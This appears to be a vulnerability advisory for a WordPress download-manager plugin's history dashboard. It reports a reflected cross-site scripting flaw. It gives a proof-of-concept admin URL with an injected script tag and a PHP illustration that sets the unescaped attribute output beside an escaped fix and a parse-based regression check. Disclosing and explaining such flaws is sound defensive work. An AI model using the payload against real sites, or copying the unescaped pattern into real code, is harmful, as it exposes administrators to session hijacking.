The plugin does not escape a generated URL before outputting it back in an attribute of the history dashboard, leading to Reflected Cross-Site Scripting.
https://example.com/wp-admin/edit.php?post_type=wpdmpro&page=wpdm-stats&type=history&user_ids[]=1&"><script>alert(/XSS/)</script>
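The flaw described above, shown as an added example that is not the plugin's code: a URL written into an attribute verbatim next to the same output encoded for the attribute context. The function names and the "Next page" link are hypothetical, and the page does not show how the plugin builds the URL.

```php
<?php
// Added illustration, not the plugin's code. Function names are hypothetical.

// Constructed input: the dashboard URL from the proof of concept, as the
// server sees it once the query string has been decoded.
$url = 'https://example.com/wp-admin/edit.php?post_type=wpdmpro&page=wpdm-stats'
     . '&type=history&user_ids[]=1&"><script>alert(/XSS/)</script>';

// Flawed pattern: the URL goes into the attribute verbatim, so a double quote
// in it ends the attribute and the remainder is parsed as markup.
function render_link_unescaped(string $url): string {
    return '<a href="' . $url . '">Next page</a>';
}

// Corrected pattern: encode for the HTML attribute context at output time.
// WordPress code would typically call esc_url() or esc_attr() here;
// htmlspecialchars() is used so the example runs without WordPress loaded.
function render_link_escaped(string $url): string {
    $attr = htmlspecialchars($url, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<a href="' . $attr . '">Next page</a>';
}

// Parse a fragment the way an HTML parser would and report what it contains.
function inspect_fragment(string $html): array {
    libxml_use_internal_errors(true);   // tolerate the deliberately broken markup
    $doc = new DOMDocument();
    $doc->loadHTML('<!DOCTYPE html><html><body>' . $html . '</body></html>');
    libxml_clear_errors();
    $links = $doc->getElementsByTagName('a');
    return [
        'script_elements' => $doc->getElementsByTagName('script')->length,
        'href' => $links->length ? $links->item(0)->getAttribute('href') : null,
    ];
}

foreach (['unescaped' => 'render_link_unescaped', 'escaped' => 'render_link_escaped'] as $label => $render) {
    $result = inspect_fragment($render($url));
    printf("%-9s script elements: %d, href intact: %s\n", $label,
        $result['script_elements'], $result['href'] === $url ? 'yes' : 'no');
}
```

The same parse check can serve as a regression test after patching: render the dashboard with a quote-bearing parameter and confirm that no element appears outside the attribute.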
ZhongFu Su (JrXnm) of WuHan University
Yes
2022-06-27 (about 7 months ago)
2022-09-26 (about 4 months ago)